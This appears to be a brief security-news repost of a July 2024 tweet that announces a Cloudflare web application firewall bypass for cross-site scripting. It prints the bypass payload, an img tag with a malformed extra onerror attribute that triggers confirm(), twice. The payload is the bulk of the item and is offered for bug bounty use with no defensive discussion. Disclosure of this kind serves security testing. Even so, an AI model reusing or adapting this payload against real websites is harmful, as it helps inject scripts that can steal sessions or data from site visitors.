A Cloudflare WAF bypass for XSS vulnerability has been discovered. The payload used for bypass is '><img src=x onerrora=confirm() onerror=confirm(1)>'. This bypass allows an attacker to execute malicious scripts on the target website. Security researchers can learn more about this bypass at https://t.co/t1NQY8dRwQ. #bugbounty #bugbountytips
CloudFlare WAF Bypass – #XSS
Payload:
"><img src=x onerrora=confirm() onerror=confirm(1)> #bugbounty #bugbountytipshttps://t.co/t1NQY8dRwQ— ?????? ?? (@dilagrafie) July 26, 2024